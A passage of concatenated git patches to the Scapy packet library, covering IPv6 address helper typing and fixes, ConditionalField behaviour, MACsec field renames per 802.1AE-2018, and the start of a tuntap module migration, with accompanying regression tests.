elif isinstance(grpid, int): + i_grpid = grpid + else: + warning( + "in6_getLinkScopedMcastPrefix(): Invalid group id " + "provided" + ) + return None + b_grpid = struct.pack("!I", i_grpid) flgscope = struct.pack("B", 0xff & ((0x3 << 4) | scope)) plen = b'\xff' res = b'\x00' - a = b'\xff' + flgscope + res + plen + iid + grpid + a = b'\xff' + flgscope + res + plen + iid + b_grpid return inet_ntop(socket.AF_INET6, a) def in6_get6to4Prefix(addr): + # type: (str) -> Optional[str] """ Returns the /48 6to4 prefix associated with provided IPv4 address On error, None is returned. No check is performed on public/private status of the address """ try: - addr = inet_pton(socket.AF_INET, addr) - addr = inet_ntop(socket.AF_INET6, b'\x20\x02' + addr + b'\x00' * 10) + baddr = inet_pton(socket.AF_INET, addr) + return inet_ntop(socket.AF_INET6, b'\x20\x02' + baddr + b'\x00' * 10) except Exception: return None - return addr def in6_6to4ExtractAddr(addr): + # type: (str) -> Optional[str] """ Extract IPv4 address embedded in 6to4 address. Passed address must be a 6to4 address. None is returned on error. """ try: - addr = inet_pton(socket.AF_INET6, addr) + baddr = inet_pton(socket.AF_INET6, addr) except Exception: return None - if addr[:2] != b" \x02": + if baddr[:2] != b" \x02": return None - return inet_ntop(socket.AF_INET, addr[2:6]) + return inet_ntop(socket.AF_INET, baddr[2:6]) def in6_getLocalUniquePrefix(): + # type: () -> str """ Returns a pseudo-randomly generated Local Unique prefix. Function follows recommendation of Section 3.2.2 of RFC 4193 for prefix @@ -385,16 +417,17 @@ def in6_getLocalUniquePrefix(): tod = time.time() # time of day. Will bother with epoch later i = int(tod) j = int((tod - i) * (2**32)) - tod = struct.pack("!II", i, j) + btod = struct.pack("!II", i, j) mac = RandMAC() # construct modified EUI-64 ID eui64 = inet_pton(socket.AF_INET6, '::' + in6_mactoifaceid(mac))[8:] import hashlib - globalid = hashlib.sha1(tod + eui64).digest()[:5] + globalid = hashlib.sha1(btod + eui64).digest()[:5] return inet_ntop(socket.AF_INET6, b'\xfd' + globalid + b'\x00' * 10) def in6_getRandomizedIfaceId(ifaceid, previous=None): + # type: (str, Optional[str]) -> Tuple[str, str] """ Implements the interface ID generation algorithm described in RFC 3041. The function takes the Modified EUI-64 interface identifier generated @@ -415,18 +448,17 @@ def in6_getRandomizedIfaceId(ifaceid, previous=None): s = b"" if previous is None: - d = b"".join(chb(x) for x in range(256)) - for _ in range(8): - s += chb(random.choice(d)) - previous = s - s = inet_pton(socket.AF_INET6, "::" + ifaceid)[8:] + previous + b_previous = bytes(RandBin(8)) + else: + b_previous = inet_pton(socket.AF_INET6, "::" + previous)[8:] + s = inet_pton(socket.AF_INET6, "::" + ifaceid)[8:] + b_previous import hashlib s = hashlib.md5(s).digest() s1, s2 = s[:8], s[8:] - s1 = chb(orb(s1[0]) | 0x04) + s1[1:] - s1 = inet_ntop(socket.AF_INET6, b"\xff" * 8 + s1)[20:] - s2 = inet_ntop(socket.AF_INET6, b"\xff" * 8 + s2)[20:] - return (s1, s2) + s1 = chb(orb(s1[0]) & (~0x04)) + s1[1:] # set bit 6 to 0 + bs1 = inet_ntop(socket.AF_INET6, b"\xff" * 8 + s1)[20:] + bs2 = inet_ntop(socket.AF_INET6, b"\xff" * 8 + s2)[20:] + return (bs1, bs2) _rfc1924map = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', # noqa: E501 @@ -438,6 +470,7 @@ def in6_getRandomizedIfaceId(ifaceid, previous=None): def in6_ctop(addr): + # type: (str) -> Optional[str] """ Convert an IPv6 address in Compact Representation Notation (RFC 1924) to printable representation ;-) @@ -459,6 +492,7 @@ def in6_ctop(addr): def in6_ptoc(addr): + # type: (str) -> Optional[str] """ Converts an IPv6 address in printable representation to RFC 1924 Compact Representation ;-) @@ -468,12 +502,11 @@ def in6_ptoc(addr): d = struct.unpack("!IIII", inet_pton(socket.AF_INET6, addr)) except Exception: return None - res = 0 + rem = 0 m = [2**96, 2**64, 2**32, 1] for i in range(4): - res += d[i] * m[i] - rem = res - res = [] + rem += d[i] * m[i] + res = [] # type: List[str] while rem: res.append(_rfc1924map[rem % 85]) rem = rem // 85 @@ -482,12 +515,13 @@ def in6_ptoc(addr): def in6_isaddr6to4(x): + # type: (str) -> bool """ Return True if provided address (in printable format) is a 6to4 address (being in 2002::/16). """ - x = inet_pton(socket.AF_INET6, x) - return x[:2] == b' \x02' + bx = inet_pton(socket.AF_INET6, x) + return bx[:2] == b' \x02' conf.teredoPrefix = "2001::" # old one was 3ffe:831f (it is a /32) @@ -495,6 +529,7 @@ def in6_isaddr6to4(x): def in6_isaddrTeredo(x): + # type: (str) -> bool """ Return True if provided address is a Teredo, meaning it is under the /32 conf.teredoPrefix prefix value (by default, 2001::). @@ -507,6 +542,7 @@ def in6_isaddrTeredo(x): def teredoAddrExtractInfo(x): + # type: (str) -> Tuple[str, int, str, int] """ Extract information from a Teredo address. Return value is a 4-tuple made of IPv4 address of Teredo server, flag value (int), @@ -515,13 +551,14 @@ def teredoAddrExtractInfo(x): """ addr = inet_pton(socket.AF_INET6, x) server = inet_ntop(socket.AF_INET, addr[4:8]) - flag = struct.unpack("!H", addr[8:10])[0] + flag = struct.unpack("!H", addr[8:10])[0] # type: int mappedport = struct.unpack("!H", strxor(addr[10:12], b'\xff' * 2))[0] mappedaddr = inet_ntop(socket.AF_INET, strxor(addr[12:16], b'\xff' * 4)) return server, flag, mappedaddr, mappedport def in6_iseui64(x): + # type: (str) -> bool """ Return True if provided address has an interface identifier part created in modified EUI-64 format (meaning it matches ``*::*:*ff:fe*:*``). @@ -529,11 +566,12 @@ def in6_iseui64(x): format. """ eui64 = inet_pton(socket.AF_INET6, '::ff:fe00:0') - x = in6_and(inet_pton(socket.AF_INET6, x), eui64) - return x == eui64 + bx = in6_and(inet_pton(socket.AF_INET6, x), eui64) + return bx == eui64 def in6_isanycast(x): # RFC 2526 + # type: (str) -> bool if in6_iseui64(x): s = '::fdff:ffff:ffff:ff80' packed_x = inet_pton(socket.AF_INET6, x) @@ -548,12 +586,13 @@ def in6_isanycast(x): # RFC 2526 # +---------------------------------+------------------+------------+ # | interface identifier field | warning('in6_isanycast(): TODO not EUI-64') - return 0 + return False -def _in6_bitops(a1, a2, operator=0): - a1 = struct.unpack('4I', a1) - a2 = struct.unpack('4I', a2) +def _in6_bitops(xa1, xa2, operator=0): + # type: (bytes, bytes, int) -> bytes + a1 = struct.unpack('4I', xa1) + a2 = struct.unpack('4I', xa2) fop = [lambda x, y: x | y, lambda x, y: x & y, lambda x, y: x ^ y @@ -563,6 +602,7 @@ def _in6_bitops(a1, a2, operator=0): def in6_or(a1, a2): + # type: (bytes, bytes) -> bytes """ Provides a bit to bit OR of provided addresses. They must be passed in network format. Return value is also an IPv6 address @@ -572,6 +612,7 @@ def in6_or(a1, a2): def in6_and(a1, a2): + # type: (bytes, bytes) -> bytes """ Provides a bit to bit AND of provided addresses. They must be passed in network format. Return value is also an IPv6 address @@ -581,6 +622,7 @@ def in6_and(a1, a2): def in6_xor(a1, a2): + # type: (bytes, bytes) -> bytes """ Provides a bit to bit XOR of provided addresses. They must be passed in network format. Return value is also an IPv6 address @@ -590,6 +632,7 @@ def in6_xor(a1, a2): def in6_cidr2mask(m): + # type: (int) -> bytes """ Return the mask (bitstring) associated with provided length value. For instance if function is called on 48, return value is @@ -608,6 +651,7 @@ def in6_cidr2mask(m): def in6_getnsma(a): + # type: (bytes) -> bytes """ Return link-local solicited-node multicast address for given address. Passed address must be provided in network format. @@ -619,19 +663,21 @@ def in6_getnsma(a): return r -def in6_getnsmac(a): # return multicast Ethernet address associated with multicast v6 destination # noqa: E501 +def in6_getnsmac(a): + # type: (bytes) -> str """ Return the multicast mac address associated with provided IPv6 address. Passed address must be in network format. """ - a = struct.unpack('16B', a)[-4:] + ba = struct.unpack('16B', a)[-4:] mac = '33:33:' - mac += ':'.join("%.2x" % x for x in a) + mac += ':'.join("%.2x" % x for x in ba) return mac def in6_getha(prefix): + # type: (str) -> str """ Return the anycast address associated with all home agents on a given subnet. @@ -642,6 +688,7 @@ def in6_getha(prefix): def in6_ptop(str): + # type: (str) -> str """ Normalizes IPv6 addresses provided in printable format, returning the same address in printable format. (2001:0db8:0:0::1 -> 2001:db8::1) @@ -650,6 +697,7 @@ def in6_ptop(str): def in6_isincluded(addr, prefix, plen): + # type: (str, str, int) -> bool """ Returns True when 'addr' belongs to prefix/plen. False otherwise. """ @@ -660,6 +708,7 @@ def in6_isincluded(addr, prefix, plen): def in6_isllsnmaddr(str): + # type: (str) -> bool """ Return True if provided address is a link-local solicited node multicast address, i.e. belongs to ff02::1:ff00:0/104. False is @@ -671,6 +720,7 @@ def in6_isllsnmaddr(str): def in6_isdocaddr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to 2001:db8::/32 address space reserved for documentation (as defined @@ -680,6 +730,7 @@ def in6_isdocaddr(str): def in6_islladdr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to _allocated_ link-local unicast address space (fe80::/10) @@ -688,6 +739,7 @@ def in6_islladdr(str): def in6_issladdr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to _allocated_ site-local address space (fec0::/10). This prefix has @@ -698,6 +750,7 @@ def in6_issladdr(str): def in6_isuladdr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to Unique local address space (fc00::/7). @@ -711,6 +764,7 @@ def in6_isuladdr(str): def in6_isgladdr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to _allocated_ global address space (2000::/3). Please note that, @@ -721,6 +775,7 @@ def in6_isgladdr(str): def in6_ismaddr(str): + # type: (str) -> bool """ Returns True if provided address in printable format belongs to allocated Multicast address space (ff00::/8). @@ -729,6 +784,7 @@ def in6_ismaddr(str): def in6_ismnladdr(str): + # type: (str) -> bool """ Returns True if address belongs to node-local multicast address space (ff01::/16) as defined in RFC @@ -737,6 +793,7 @@ def in6_ismnladdr(str): def in6_ismgladdr(str): + # type: (str) -> bool """ Returns True if address belongs to global multicast address space (ff0e::/16). @@ -745,6 +802,7 @@ def in6_ismgladdr(str): def in6_ismlladdr(str): + # type: (str) -> bool """ Returns True if address belongs to link-local multicast address space (ff02::/16) @@ -753,6 +811,7 @@ def in6_ismlladdr(str): def in6_ismsladdr(str): + # type: (str) -> bool """ Returns True if address belongs to site-local multicast address space (ff05::/16). Site local address space has been deprecated. @@ -762,6 +821,7 @@ def in6_ismsladdr(str): def in6_isaddrllallnodes(str): + # type: (str) -> bool """ Returns True if address is the link-local all-nodes multicast address (ff02::1). @@ -771,6 +831,7 @@ def in6_isaddrllallnodes(str): def in6_isaddrllallservers(str): + # type: (str) -> bool """ Returns True if address is the link-local all-servers multicast address (ff02::2). @@ -780,6 +841,7 @@ def in6_isaddrllallservers(str): def in6_getscope(addr): + # type: (str) -> int """ Returns the scope of the address. """ @@ -808,10 +870,12 @@ def in6_getscope(addr): def in6_get_common_plen(a, b): + # type: (str, str) -> int """ Return common prefix length of IPv6 addresses a and b. """ def matching_bits(byte1, byte2): + # type: (int, int) -> int for i in range(8): cur_mask = 0x80 >> i if (byte1 & cur_mask) != (byte2 & cur_mask): @@ -828,6 +892,7 @@ def matching_bits(byte1, byte2): def in6_isvalid(address): + # type: (str) -> bool """Return True if 'address' is a valid IPv6 address string, False otherwise.""" @@ -838,12 +903,13 @@ def in6_isvalid(address): return False -class Net6(Gen): # syntax ex. fec0::/126 +class Net6(Gen[str]): # syntax ex. fec0::/126 """Generate a list of IPv6s from a network address or a name""" name = "ipv6" ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") def __init__(self, net): + # type: (str) -> None self.repr = net tmp = net.split('/') + ["128"] @@ -854,11 +920,13 @@ def __init__(self, net): self.net = inet_pton(socket.AF_INET6, tmp[0]) self.mask = in6_cidr2mask(netmask) self.plen = netmask + self.parsed = [] # type: List[Tuple[int, int]] def _parse(self): + # type: () -> None def parse_digit(value, netmask): + # type: (int, int) -> Tuple[int, int] netmask = min(8, max(netmask, 0)) - value = int(value) return (value & (0xff << netmask), (value | (0xff >> (8 - netmask))) + 1) @@ -870,9 +938,11 @@ def parse_digit(value, netmask): ] def __iter__(self): + # type: () -> Iterator[str] self._parse() def rec(n, li): + # type: (int, List[str]) -> List[str] sep = ':' if n and n % 2 == 0 else '' if n == 16: return li @@ -884,22 +954,27 @@ def rec(n, li): return (in6_ptop(addr) for addr in iter(rec(0, ['']))) def __iterlen__(self): + # type: () -> int self._parse() - return reduce(operator.mul, ((y - x) for (x, y) in self.parsed), 1) + return reduce(operator.mul, ((y - x) for x, y in self.parsed), 1) def __str__(self): + # type: () -> str try: return next(self.__iter__()) except (StopIteration, RuntimeError): - return None + return "" def __eq__(self, other): + # type: (Any) -> bool return str(other) == str(self) def __ne__(self, other): + # type: (Any) -> bool return not self == other - __hash__ = None + __hash__ = None # type: ignore def __repr__(self): + # type: () -> str return "Net6(%r)" % self.repr diff --git a/test/regression.uts b/test/regression.uts index c205784ece1..7adddc4612d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2107,18 +2107,21 @@ in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff: ########### RFC 3041 related function ############################### = Test in6_getRandomizedIfaceId + import socket -res=True for a in six.moves.range(10): - s1,s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3') - inet_pton(socket.AF_INET6, '::'+s1) - tmp2 = inet_pton(socket.AF_INET6, '::'+s2) - res = res and ((orb(s1[0]) & 0x04) == 0x04) - s1,s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous=tmp2) - tmp = inet_pton(socket.AF_INET6, '::'+s1) - inet_pton(socket.AF_INET6, '::'+s2) - res = res and ((orb(s1[0]) & 0x04) == 0x04) + s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3') + s1, s2 + tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] + tmp + assert (orb(tmp[0]) & 0x04) == 0 + s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous=s2) + s1, s2 + tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] + assert (orb(tmp[0]) & 0x04) == 0 + +assert in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous='d006:d540:db11:b092') == ('721f:11fa:3743:fc7f', '5946:5272:7fcc:108a') ########### RFC 1924 related function ############################### = Test RFC 1924 function - in6_ctop() basic test From fa1125ad2b5cc3356118714d314b80aad39511d2 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 11 Nov 2020 17:55:56 +0100 Subject: [PATCH 0386/1632] Use namedtuples in SndRcvList() to simplify packets manipulation --- scapy/sendrecv.py | 5 ++++- test/regression.uts | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 063d091b5cf..3b8f52f9db9 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -8,6 +8,7 @@ """ from __future__ import absolute_import, print_function +from collections import namedtuple import itertools from threading import Thread, Event import os @@ -52,6 +53,8 @@ class debug: # Send / Receive # #################### +QueryAnswer = namedtuple("QueryAnswer", ["query", "answer"]) + _DOC_SNDRCV_PARAMS = """ :param pks: SuperSocket instance to send/receive packets :param pkt: the packet to send @@ -233,7 +236,7 @@ def _process_packet(self, r): hlst = self.hsent[h] for i, sentpkt in enumerate(hlst): if r.answers(sentpkt): - self.ans.append((sentpkt, r)) + self.ans.append(QueryAnswer(sentpkt, r)) if self.verbose > 1: os.write(1, b"*") ok = True diff --git a/test/regression.uts b/test/regression.uts index 7adddc4612d..77d626887be 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1613,6 +1613,8 @@ def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False ans, unans = sr(IP(dst="www.google.fr") / ICMP(), timeout=2) + assert ans[0].query == ans[0][0] + assert ans[0].answer == ans[0][1] conf.debug_match = old_debug_match conf.debug_dissector = old_debug_dissector assert ans and not unans From 88b3481bdc315e3ecc54e1d315552ba49e61332c Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 6 Dec 2019 09:44:03 +0100 Subject: [PATCH 0387/1632] Do not add an unused conditional field in packet fields --- scapy/packet.py | 3 +++ test/fields.uts | 25 +++++++++++++++++++++---- 2 files changed, 24 insertions(+), 4 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 11dbd56f2b3..5b88a9f9ab3 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -964,6 +964,9 @@ def do_dissect(self, s): if not s: break s, fval = f.getfield(self, s) + # Skip unused ConditionalField + if isinstance(f, ConditionalField) and fval is None: + continue # We need to track fields with mutable values to discard # .raw_packet_cache when needed. if f.islist or f.holds_packets or f.ismutable: diff --git a/test/fields.uts b/test/fields.uts index e1f44a7b07d..d8cbc0ebd7e 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -14,10 +14,27 @@ #assert( _ == b"FOO\x12" ) #Field("foo", None, fmt="I").getfield(None, b"\x12\x34\x56\x78ABCD") #assert( _ == ("ABCD",0x12345678) ) -# -#= ConditionnalField class -#~ core field -#False + + += ConditionnalField class +~ core field + +class TEST_COND(Packet): + fields_desc = [ + IntField("A", 0), + ConditionalField(IntField("A0",0), lambda pkt:pkt.A == 0), + ConditionalField(IntField("A1",0), lambda pkt:pkt.A != 0), + IntField("B", 0), + ConditionalField(IntField("B0",0), lambda pkt:pkt.B == 0), + ConditionalField(IntField("B1",0), lambda pkt:pkt.B != 0), + ] + +print(TEST_COND(TEST_COND().build()).fields) + +a = TEST_COND() +b = TEST_COND(raw(TEST_COND())) +assert raw(a) == raw(b) +assert a == b = Simple tests From 14b5a78e5f8a37e90c647c27677a84fdb3ba85a0 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 7 Oct 2020 22:12:37 +0200 Subject: [PATCH 0388/1632] Fix ConditionalField dependencies --- doc/scapy/build_dissect.rst | 1 + scapy/fields.py | 5 +++++ scapy/layers/l2tp.py | 2 +- test/contrib/gtp.uts | 7 ++++--- test/fields.uts | 37 +++++++++++++++++++++++++++++++++++++ test/scapy/layers/l2tp.uts | 2 +- 6 files changed, 49 insertions(+), 5 deletions(-) diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index 1601332c14b..562f5f01bea 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -1043,6 +1043,7 @@ Special # Wrapper to make field 'fld' only appear if # function 'cond' evals to True, e.g. # ConditionalField(XShortField("chksum",None),lambda pkt:pkt.chksumpresent==1) + # When hidden, it won't be built nor dissected and the stored value will be 'None' PadField(fld, align, padwith=None) diff --git a/scapy/fields.py b/scapy/fields.py index a188f9ea6ed..a1204c502ad 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -309,6 +309,11 @@ def _evalcond(self, pkt): # type: (Packet) -> bool return bool(self.cond(pkt)) + def i2h(self, pkt, val): + if not self._evalcond(pkt): + return None + return self.fld.i2h(pkt, val) + def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, Any] if self._evalcond(pkt): diff --git a/scapy/layers/l2tp.py b/scapy/layers/l2tp.py index dc79de393a6..a8e6f28a253 100644 --- a/scapy/layers/l2tp.py +++ b/scapy/layers/l2tp.py @@ -40,7 +40,7 @@ class L2TP(Packet): ] def post_build(self, pkt, pay): - if self.len is None: + if self.len is None and self.hdr & 'control+length': tmp_len = len(pkt) + len(pay) pkt = pkt[:2] + struct.pack("!H", tmp_len) + pkt[4:] return pkt + pay diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 011fb0827f9..dfce978ef13 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -304,8 +304,7 @@ ie = gtp.IE_list[5] ie.ietype == 135 and ie.allocation_retention_prioiry == 2 and ie.delay_class == 2 and ie.traffic_class == 3 = IE_QoS(), basic instantiation -ie = IE_QoS( - allocation_retention_prioiry=2, delay_class=2, traffic_class=3) +ie = IE_QoS(allocation_retention_prioiry=2, delay_class=2, traffic_class=3, length=50) ie.ietype == 135 and ie.allocation_retention_prioiry == 2 and ie.delay_class == 2 and ie.traffic_class == 3 = IE_CommonFlags(), dissect @@ -385,7 +384,9 @@ ie.ietype == 191 and ie.PCI == 1 = IE_CharginGatewayAddress(), basic instantiation ie = IE_CharginGatewayAddress() -ie.ietype == 251 and ie.ipv4_address == '127.0.0.1' and ie.ipv6_address == '::1' +assert ie.ietype == 251 and ie.ipv4_address == '127.0.0.1' +ie = IE_CharginGatewayAddress(length=16) +assert ie.ietype == 251 and ie.ipv6_address == '::1' = IE_PrivateExtension(), basic instantiation ie = IE_PrivateExtension(extention_value='hello') diff --git a/test/fields.uts b/test/fields.uts index d8cbc0ebd7e..e3597da12f5 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -19,6 +19,8 @@ = ConditionnalField class ~ core field +# Test equality with conditional fields + class TEST_COND(Packet): fields_desc = [ IntField("A", 0), @@ -36,6 +38,41 @@ b = TEST_COND(raw(TEST_COND())) assert raw(a) == raw(b) assert a == b +# Test ConditionalField dependencies + +class TEST_COND(Packet): + fields_desc = [ + ByteField('A', 0), + ConditionalField(ByteField('B', 0), + lambda pkt:pkt.A != 0), + ConditionalField(ByteField('C', 0), + lambda pkt:pkt.B == 0), + ] + +assert TEST_COND().build() == b'\x00' + +# Test MultipleTypeField in ConditionalField + +class TEST_INNER(Packet): + fields_desc = [ + ByteField('A', 0), + ByteField('B', 0), + ConditionalField( + MultipleTypeField( + [ + (ByteField('C', 1), lambda pkt: pkt.B == 1), + (ByteField('C', 2), lambda pkt: pkt.B == 2), + ], + ByteField('C', 0), + ), + lambda pkt: pkt.A, + ) + ] + +pkt = TEST_INNER() +pkt.A = 1 +pkt.B = 1 +assert pkt.C == 1 = Simple tests diff --git a/test/scapy/layers/l2tp.uts b/test/scapy/layers/l2tp.uts index 6cf3ae3be62..b4984b93aa8 100644 --- a/test/scapy/layers/l2tp.uts +++ b/test/scapy/layers/l2tp.uts @@ -5,7 +5,7 @@ + L2TP tests = L2TP - build -s = raw(IP()/UDP()/L2TP()) +s = raw(IP(src="127.0.0.1", dst="127.0.0.1")/UDP()/L2TP()) s == b'E\x00\x00"\x00\x01\x00\x00@\x11|\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x06\xa5\x06\xa5\x00\x0e\xf4\x83\x00\x02\x00\x00\x00\x00' = L2TP - dissection From 3de5578b78e9c7cf78ecb95987fdf27250900e27 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 8 Oct 2020 22:02:40 +0200 Subject: [PATCH 0389/1632] Restore ConditionalField backward compatibility --- scapy/fields.py | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/scapy/fields.py b/scapy/fields.py index a1204c502ad..eaaacbe1423 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -309,7 +309,23 @@ def _evalcond(self, pkt): # type: (Packet) -> bool return bool(self.cond(pkt)) + def any2i(self, pkt, x): + # type: (BasePacket, Any) -> Any + # BACKWARD COMPATIBILITY + # Note: we shouldn't need this function. (it's not correct) + # However, having i2h implemented (#2364), it changes the default + # behavior and broke all packets that wrongly use two ConditionalField + # with the same name. Those packets are the problem: they are wrongly + # built (they should either be re-using the same conditional field, or + # using a MultipleTypeField). + # But I don't want to dive into fixing all of them just yet, + # so for now, let's keep this this way, even though it's not correct. + if type(self.fld) == Field: + return x + return self.fld.any2i(pkt, x) + def i2h(self, pkt, val): + # type: (BasePacket, Any) -> Any if not self._evalcond(pkt): return None return self.fld.i2h(pkt, val) From d1fc7e3eb96083d09a18c66d26865bc4c2d089b1 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 13 Nov 2020 16:01:45 +0100 Subject: [PATCH 0390/1632] Cleanup MACsec according to 802.1AE-2018 --- scapy/contrib/macsec.py | 49 +++++++++++++++++++++++++++------------ scapy/fields.py | 6 ++--- test/contrib/pnio_dcp.uts | 1 - 3 files changed, 37 insertions(+), 19 deletions(-) diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index 64ae04542af..a60d88b3d14 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -139,8 +139,11 @@ def encap(self, pkt): # encap(), it is def decap(self, orig_pkt): """decapsulate a MACsec frame""" - if orig_pkt.name != Ether().name or orig_pkt.payload.name != MACsec().name: # noqa: E501 - raise TypeError('cannot decapsulate MACsec packet, must be Ethernet/MACsec') # noqa: E501 + if not isinstance(orig_pkt, Ether) or \ + not isinstance(orig_pkt.payload, MACsec): + raise TypeError( + 'cannot decapsulate MACsec packet, must be Ethernet/MACsec' + ) packet = copy.deepcopy(orig_pkt) prev_layer = packet[MACsec].underlayer prev_layer.type = packet[MACsec].type @@ -210,19 +213,35 @@ def decrypt(self, orig_pkt, assoclen=None): class MACsec(Packet): """representation of one MACsec frame""" name = '802.1AE' - fields_desc = [BitField('Ver', 0, 1), - BitField('ES', 0, 1), - BitField('SC', 0, 1), - BitField('SCB', 0, 1), - BitField('E', 0, 1), - BitField('C', 0, 1), - BitField('an', 0, 2), - BitField('reserved', 0, 2), - BitField('shortlen', 0, 6), - IntField("pn", 1), - ConditionalField(PacketField("sci", None, MACsecSCI), lambda pkt: pkt.SC), # noqa: E501 - ConditionalField(XShortEnumField("type", None, ETHER_TYPES), - lambda pkt: pkt.type is not None)] + deprecated_fields = { + 'an': ("AN", "2.4.4"), + 'pn': ("PN", "2.4.4"), + 'sci': ("SCI", "2.4.4"), + 'shortlen': ("SL", "2.4.4"), + } + # 802.1AE-2018 - Section 9 + fields_desc = [ + # 802.1AE-2018 - Section 9.5 + BitField('Ver', 0, 1), + BitField('ES', 0, 1), # End Station + BitField('SC', 0, 1), # Secure Channel + BitField('SCB', 0, 1), # Single Copy Broadcast + BitField('E', 0, 1), # Encryption + BitField('C', 0, 1), # Changed Text + BitField('AN', 0, 2), # Association Number + # 802.1AE-2018 - Section 9.7 + BitField('reserved', 0, 2), + BitField('SL', 0, 6), # Short Length + # 802.1AE-2018 - Section 9.8 + IntField("PN", 1), # Packet Number + # 802.1AE-2018 - Section 9.9 + ConditionalField( + PacketField("SCI", None, MACsecSCI), + lambda pkt: pkt.SC + ), + # Off-spec. Used for conveniency (only present if passed manually) + ConditionalField(XShortEnumField("type", None, ETHER_TYPES), + lambda pkt: "type" in pkt.fields)] def mysummary(self): summary = self.sprintf("an=%MACsec.an%, pn=%MACsec.pn%") diff --git a/scapy/fields.py b/scapy/fields.py index eaaacbe1423..361c7b8afff 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -310,7 +310,7 @@ def _evalcond(self, pkt): return bool(self.cond(pkt)) def any2i(self, pkt, x): - # type: (BasePacket, Any) -> Any + # type: (Optional[Packet], Any) -> Any # BACKWARD COMPATIBILITY # Note: we shouldn't need this function. (it's not correct) # However, having i2h implemented (#2364), it changes the default @@ -325,8 +325,8 @@ def any2i(self, pkt, x): return self.fld.any2i(pkt, x) def i2h(self, pkt, val): - # type: (BasePacket, Any) -> Any - if not self._evalcond(pkt): + # type: (Optional[Packet], Any) -> Any + if pkt and not self._evalcond(pkt): return None return self.fld.i2h(pkt, val) diff --git a/test/contrib/pnio_dcp.uts b/test/contrib/pnio_dcp.uts index a48ef7c688a..c7d8f753503 100644 --- a/test/contrib/pnio_dcp.uts +++ b/test/contrib/pnio_dcp.uts @@ -183,7 +183,6 @@ assert(p[ProfinetDCP].option == 0x02) assert(p[ProfinetDCP].sub_option == 0x02) assert(p[ProfinetDCP].dcp_block_length == 0x08) assert(p[ProfinetDCP].block_qualifier == 0x0001) -assert(p[ProfinetDCP].name_of_station == b'device') = DCP Identify Response crafting From e2e0fdf4a0e8e90b6d5b8a08a9e18166e731e873 Mon Sep 17 00:00:00 2001 From: Michael Farrell Date: Tue, 30 Jul 2019 18:30:35 +1000 Subject: [PATCH 0391/1632] Migrate tuntap into own module, and fix bugs: (v6) * Adds ICMPEcho_am for responding for pings (simple test program) * BitField size param may be callable * Fixed tun on non-Linux platforms * Tested on Linux and macOS 10.14 (though Travis CI doesn't work well with loading your own kexts -- so it's disabled in tests) * Added documentation and tests for TunTap * Tag tests as `tap` or `tun` rather than `linux`, and don't run them on Windows or Solaris for now * Optionally expose Linux-specific TUN headers (disabled by default) * Should work on big-endian Linux now too (not tested) --- .config/ci/test.sh | 3 +- .config/codespell_ignore.txt | 1 + doc/scapy/layers/tuntap.rst | 222 ++++++++++++++++++++++++++++++ scapy/ansmachine.py | 5 +- scapy/arch/bpf/supersocket.py | 14 +- scapy/arch/common.py | 4 +- scapy/arch/linux.py | 3 +- scapy/config.py | 2 +- scapy/consts.py | 3 +- scapy/fields.py | 2 + scapy/layers/inet.py | 29 ++++ scapy/layers/inet6.py | 6 +- scapy/layers/tuntap.py | 238 ++++++++++++++++++++++++++++++++ scapy/sendrecv.py | 4 +- scapy/supersocket.py | 84 ++---------- test/configs/solaris.utsc | 2 + test/configs/windows.utsc | 12 +- test/configs/windows2.utsc | 40 ++++++ test/linux.uts | 6 + test/sendsniff.uts | 113 ++++++++------- test/tuntap.uts | 250 ++++++++++++++++++++++++++++++++++ 21 files changed, 903 insertions(+), 140 deletions(-) create mode 100644 doc/scapy/layers/tuntap.rst create mode 100644 scapy/layers/tuntap.py create mode 100644 test/configs/windows2.utsc create mode 100644 test/tuntap.uts diff --git a/.config/ci/test.sh b/.config/ci/test.sh index ec8ebe63274..edcd0531752 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -26,7 +26,8 @@ then elif [ "$OSTYPE" = 